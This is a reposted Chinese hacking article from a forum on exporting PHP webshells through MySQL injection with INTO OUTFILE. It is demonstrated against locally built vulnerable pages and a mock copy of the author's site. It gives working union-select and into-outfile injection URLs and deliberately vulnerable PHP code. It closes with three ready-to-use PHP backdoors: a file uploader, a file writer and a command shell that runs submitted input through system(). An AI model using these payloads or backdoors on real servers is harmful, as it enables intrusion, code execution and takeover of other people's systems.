[转载]MySQL注入中导出字段内容的研究
<P>文章作者:angel/安全天使<BR>信息来源:华夏黑客同盟<BR><A href="http://www.77169.org/Article/HTML/11818.html">[url]http://www.77169.org/Article/HTML/11818.html[/url]</A></P><P>MySQL注入中导出字段内容的研究——通过注入导出WebShell<BR><SPAN style="FONT-SIZE: 14px; LINE-HEIGHT: 18px"></P>
<P>
<P><STRONG>声明:本文已发表在《黑客X档案》,转载请注明。</STRONG></P>
<P><STRONG>前言</STRONG></P>
<P> 记得有一些关于利用MySQL获得Shell的文章,说的是得到一个root权限,远程连接并建立一个表,在里面插入Shell的内容,然后利用into outfile导出到相应目录,就有了一个后门。我一直没有在意,因为能对MySQL数据库直接操作的机会非常少,而且早已经掌握了,就不用整天拿这个技术当宝,也就淡忘了。Super·Hei看完我的《<A href="http://4ngel.net/article/36.htm" target=_blank><FONT color=#636194>SQL Injection with MySQL</FONT></A>》、《<A href="http://4ngel.net/article/30.htm" target=_blank><FONT color=#636194>Advanced SQL Injection with MySQL</FONT></A>》这两篇文章,就和我说,能不能把导出数据的技术用在注入中,这样可以通过注入获得Shell的机会就很大了,其实关于导出数据在《<A href="http://4ngel.net/article/36.htm" target=_blank><FONT color=#636194>SQL Injection with MySQL</FONT></A>》这篇文章已经提到,而且也挺详细的。本文只讨论通过注入获得Shell,局限性挺大,这种是很灵活的技术,视实际情况而定,但如果利用成功,直接威胁到主机的安全。</P>
<P><STRONG>实现原理</STRONG></P>
<P> 大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。最大的局限就在这里——插入数据,所以我们只能从程序现有的功能入手,其实很多程序都可以提交评论、留言、帖子等,就看程序是怎么把变量插入数据库的。其实道路就在我们身边,靠我们自己去开辟。<BR> 不用多说,先看在本地测试的一个简单例子,建立一个表,结构如下:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff>CREATE TABLE `article` (<BR> `articleid` INT NOT NULL AUTO_INCREMENT ,<BR> `title` VARCHAR( 200 ) NOT NULL ,<BR> `content` TEXT NOT NULL ,<BR> `visible` INT DEFAULT '1' NOT NULL ,<BR> PRIMARY KEY ( `articleid` )<BR>);</FONT></TD></TR></TBODY></TABLE></P>
<P> 浏览文章的文件show.php如下:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff><?php<BR>$servername = "localhost";<BR>$dbusername = "root";<BR>$dbpassword = "";<BR>$dbname = "injection";
<P>mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");</P>
<P>$sql = "SELECT * FROM article WHERE articleid=$id and visible=1";<BR>$result = mysql_db_query($dbname,$sql);<BR>$row = mysql_fetch_array($result);</P>
<P>if (!$row) {<BR> echo "该记录不存在";<BR> echo "<p>SQL Query:$sql<p>";<BR> exit;<BR>}</P>
<P>function html_clean($content){<BR> $content = htmlspecialchars($content);<BR> $content = str_replace("\n", "<br>", $content);<BR> $content = str_replace(" ", " ", $content);<BR> $content = str_replace("\t", ' ', $content);<BR> return $content;<BR>}</P>
<P>echo "<title>".$row['title']."</title>";<BR>echo "<b>标题:</b>".htmlspecialchars($row['title'])."<hr>\n";<BR>echo "<b>内容:</b><p>".html_clean($row['content'])."</p><hr>\n";<BR>echo "SQL Query:$sql";<BR>?></P></FONT></TD></TR></TBODY></TABLE></P>
<P> 游客提交文章的文件add.php如下:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff><?<BR>$servername = "localhost";<BR>$dbusername = "root";<BR>$dbpassword = "";<BR>$dbname = "injection";
<P>mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");</P>
<P>if ($_POST['action']=="add") {<BR> if ($title=="" OR $content=="") {<BR> echo "您还没有填写完表单。";<BR> exit;<BR> } else {<BR> $sql="INSERT INTO article (title,content,visible) VALUES('$title','$content','0')";<BR> // 如果 visible 字段为1 ,则表示显示此文。<BR> // 由于是游客提交的,肯定是插入0,管理员审核后更新为1。<BR> mysql_db_query($dbname, $sql);<BR> mysql_close();<BR> echo "您已经提交完毕,正在等待管理员审核。";<BR> exit;<BR> }<BR>}<BR>?><BR><form action="add.php" method="POST"><BR>文章标题:<br><input name="title" type="text" size="50" maxlength="100"><p><BR>文章内容:<br><textarea name="content" cols="50" rows="15"></textarea><p><BR><input type="hidden" name="action" value="add"><input type="submit" value="提交"><BR></form></P></FONT></TD></TR></TBODY></TABLE></P>
<P> 很多程序都是直接把用户的数据插入数据库中,需要调用的时候再用函数来处理,就像上面的show.php一样。这样给我们造就了一个机会,就是把我们的WebShell原封不动的写进数据库,很少有程序是将变量处理后才插进数据库的,VBB都是直接放。<BR> 我们访问add.php提交我们的代码进文章内容,此时文章是隐藏的,我们怎么知道那篇文章的id呢?其实很简单:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff>[url]http://127.0.0.1/injection/show.php?id=2[/url]<BR># 这样是浏览正常文章,如果文章不显示,几时存在也会提示不存在。<BR>[url]http://127.0.0.1/injection/show.php?id=2/[/url]*<BR># 这样可以注释掉visible字段的判断,则可显示被隐藏的文章。</FONT></TD></TR></TBODY></TABLE></P>
<P align=center><IMG height=448 src="http://www.77169.org/Article/UploadFiles/200409/20040917015827966.GIF" width=658></P>
<P> <SPAN style="FONT-SIZE: 14px; LINE-HEIGHT: 18px"> </P>
<P></P>
<P>注意看上图的SQL Query那里,只要我们注释掉后面的判断,就可以改变id来找我们的文章了,刚才我们是提交了完整的代码,这个代码是我写的一个小型上传型后门,可以上传任何类型的文件到该脚本所在的目录,但大小不能超过php.ini里的设置。<BR> 现在代码已经写入了,现在开始构造我们的into outfile语句了,只要构造正确,我们的导出文件就会乖乖的躺在预定目录里,至于如何找到web绝对路径,如何找到有可写权限的目录,不在本文讨论范围,相信这些也难不到大家。提交:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff>[url]http://127.0.0.1/injection/show.php?id=2[/url] into outfile 'f:/www/1.php'/*</FONT></TD></TR></TBODY></TABLE></P>
<P> 返回如下提示:</P>
<P align=center><IMG height=448 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828964.GIF" width=714></P>
<P> 看到了吧?SQL语句是正确的,尽管出现了错误提示,但只要目录存在并可写,那文件就一定已经被导出:</P>
<P align=center><IMG height=541 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828776.gif" width=654></P>
<P> 我们上传的后门也正常执行了,因为php代码并没有被破坏。退一步来说,就算表单的引号被破坏了,我们还是可以在本地构造表单的。</P>
<P align=center><IMG height=349 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828923.GIF" width=496></P>
<P><STRONG>实例</STRONG></P>
<P> 相信大家看到这里已经对通过注入导出WebShell已经有点认识和思路了。上面是一个最简单的,最顺畅的一个例子。看似条件苛刻,实际无处不在,看似简单,实际发挥<A class=Channel_KeyLink href="http://idc.77169.com/">空间</A>很大,如果灵活运用,危害是不小的,下面就看一个更实际的例子,可以看作是一次完整的渗透测试。<BR> 由于我现在不能上网,我就在本地搭建一个和[url]http://www.4ngel.net[/url]一摸一样的站点来进行渗透,所有数据库和文件都和网上一样,文章和<A class=Channel_KeyLink href="http://bbs.77169.com/">论坛</A>共用一个数据库,都是我前天备份下来的。我现在去掉了showarticle.php文件中的对于$id过滤的代码。形成一个有漏洞的站点(有点委屈了,55555)。</P>
<P align=center><IMG height=426 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828310.GIF" width=654></P>
<P><EM>注意:当前环境是magic_quotes_gpc = Off,有些程序做对输入的变量做了处理,比如VBB,所以gpc打开或关闭无所谓。</EM></P>
<P> 整个站点没有提交文章、留言、评论的地方,我们不能从站点上提交我们的代码,幸好,有一个<A class=Channel_KeyLink href="http://bbs.77169.com/">论坛</A>,呵呵,很多地方是可以提交我们的数据的,帖子、签名等,我们就把WebShell的代码写在签名里吧。</P>
<P align=center><IMG height=426 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828651.GIF" width=728></P>
<P> 然后我们就可以通过文章页面的注入点跨表查询签名的内容,然后导出来,有了WebShell,就算有safe_mode阻拦,但我们要渗透服务器,是基本没有问题的。看上面的第5幅图就知道了,文章查询的是5个字段,我们现在就用union联合查询,关于union联合查询在我的《SQL Injection with MySQL》中已经说得很清楚了,这里不再阐述。我们在union之后的查询中,也指定5个字段“1,1,1,1,1”,查询user表中angel用户,userid为1,如果构造正确,用户存在。页面会正常返回:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff>[url]http://127.0.0.1/showarticle.php?id=25[/url]' union select 1,1,1,1,1 from user where userid=1/*</FONT></TD></TR></TBODY></TABLE></P>
<P align=center><IMG height=426 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828634.GIF" width=717></P>
<P> 我们看看是否真的能查询到<A class=Channel_KeyLink href="http://bbs.77169.com/">论坛</A>的签名的内容,刚才看到出错的SQL语句,知道查询文章内容(content)的字段是第5个,签名的字段名是“signature”,我们把第5个1换成“signature”,然后给前面的$id指定一个不存在的值,这样就可以在原来显示文章内容的地方显示签名的内容了。构造:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff>[url]http://127.0.0.1/showarticle.php?id=55[/url]' union select 1,1,1,1,signature from user where userid=1/*</FONT></TD></TR></TBODY></TABLE></P>
<P align=center><IMG height=489 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828367.GIF" width=778></P>
<P> 嗯,查询成功,开始导出吧,我本地的Web目录是f:/www,这个我是知道的,呵呵,至于大家实际运用的时候,如何获取Web绝对路径,不要来问我。<BR> 紧接着刚才我们构造的语句,在后面加上into outfile吧,提交:</P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff>[url]http://127.0.0.1/showarticle.php?id=55[/url]' union select 1,1,1,1,signature from user where userid=1 into outfile 'f:/www/angel.php'/*</FONT></TD></TR></TBODY></TABLE></P>
<P> 嗯,出现错误提示了,不管他,反正我们语句没有构造错,而且我的F盘是Everyone完全控制的。自然我们的angel.php也出来了:</P>
<P align=center><IMG height=651 src="http://www.77169.org/Article/UploadFiles/200409/20040917015828300.gif" width=654></P>
<P> 看似复杂的东西,实际上是好容易掌握的,最主要是灵活性,程序的代码各异,加上php的特性,利用的办法就多种多样了,不过有一点是要注意的,就是如果要导出数据,单引号一定不能被破坏,可能来自程序代码,可能来自magic_quotes_gpc,只要单引号被破坏了,成功率几乎是零了。<BR> 请各位不要用安全天使的站点来练手,既然这篇文章是我写的,我的站点就不会存在这种问题了。</P>
<P><STRONG>后记</STRONG></P>
<P> 希望本文能起到抛砖引玉的效果,其他更深层的技术,就靠大家自己去探索了,如果本文有什么错漏的地方或对本文有不明白的地方,可以到安全天使的<A class=Channel_KeyLink href="http://bbs.77169.com/">论坛</A>与我交流。下面附上一些我写的、也经常用到的php后门,由于当时才刚学习php不久,下面的代码可能问题很多,如果想用功能更加强大php后门。建议下载我开发的<A href="http://4ngel.net/project/phpspy.htm" target=_blank><FONT color=#636194>phpspy</FONT></A>。</P>
<P><STRONG><EM>PHP上传型后门</EM></STRONG></P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff><?php<BR>// Codz by angel on 2004, May 26<BR>// Powered by Security Angel Team<BR>$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "上传成功" : "上传失败";<BR>echo $msg;<BR>?><BR><form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST"> <BR><input NAME="MyFile" TYPE="file"> <BR><input VALUE="提交" TYPE="submit"></form></FONT></TD></TR></TBODY></TABLE></P>
<P><STRONG><EM>PHP文件生成型后门</EM></STRONG></P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee>
<P><FONT color=#0000ff><?php<BR>// Codz by angel on 2004, May 26<BR>// Powered by Security Angel Team<BR>// 去除转义字符<BR>function stripslashes_array(&$array) {<BR> while(list($key,$var) = each($array)) {<BR> if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {<BR> if (is_string($var)) {<BR> $array[$key] = stripslashes($var);<BR> }<BR> if (is_array($var)) {<BR> $array[$key] = stripslashes_array($var);<BR> }<BR> }<BR> }<BR> return $array;<BR>}<BR><BR>// 判断 magic_quotes_gpc 状态<BR>if (get_magic_quotes_gpc()) {<BR> $_POST = stripslashes_array($_POST);<BR>}<BR><BR>// 执行操作<BR>if($_POST['action']=="create"){ <BR> $fp=@fopen("".$_POST['filename']."","wb"); <BR> $content = $_POST['filedate'];<BR> </FONT><FONT color=#0000ff>$fw=@fwrite($fp,$content);<BR> if ($fw) { <BR> echo "<b>恭喜,写入文件成功!</b><a href=".$PHP_SELF.">返回</a>"; <BR> exit; <BR> } else { <BR> echo "<b>写入文件失败,是不是权限的问题?</b><a href=".$PHP_SELF.">返回</a>"; <BR> exit; <BR> } <BR> @fclose($fp);<BR>}<BR>?><BR><form action="" method="post"><BR>保存的文件名(如:<font color="#FF0000">angel.php</font>):<br><BR><input type="text" name="filename" size="60"><BR><p><BR>文件保存在:<br><?=str_replace('\\','/',dirname(__FILE__))?><BR><p><BR>文件内容:<BR><br><textarea name="filedate" cols="60" rows="10"></textarea><br><BR><input type="hidden" name="action" value="create"><input type="submit" value="保存"><BR></form><BR><b>注意:当有相同的文件存在时,将完全改写其内容!</b></FONT></P></TD></TR></TBODY></TABLE></P>
<P><STRONG><EM>执行命令型后门</EM></STRONG></P>
<P>
<TABLE cellSpacing=1 cellPadding=5 width="100%" align=center bgColor=#cccccc border=0>
<TBODY>
<TR>
<TD class=code bgColor=#eeeeee><FONT color=#0000ff><?php<BR>// Codz by angel on 2004, May 26<BR>// Powered by Security Angel Team<BR>// 非常简陋的shell,估计会有不少问题。<BR>?><BR><form action="" method="post"><BR>命令:<br><BR><input type="text" name="command" size="60" <?php if ($command) { echo "value=\"$command\"";} ?>> <input name="submit_btn" type="submit" value="执行"></p><BR>执行结果:<br><BR><textarea cols="80" rows="20" readonly><?phpif ($command) { system($command);}?></textarea><p><BR>注意:在windows主机部分命令可能有限制</form></FONT></TD></TR></TBODY></TABLE></P></SPAN></SPAN>
页:
[1]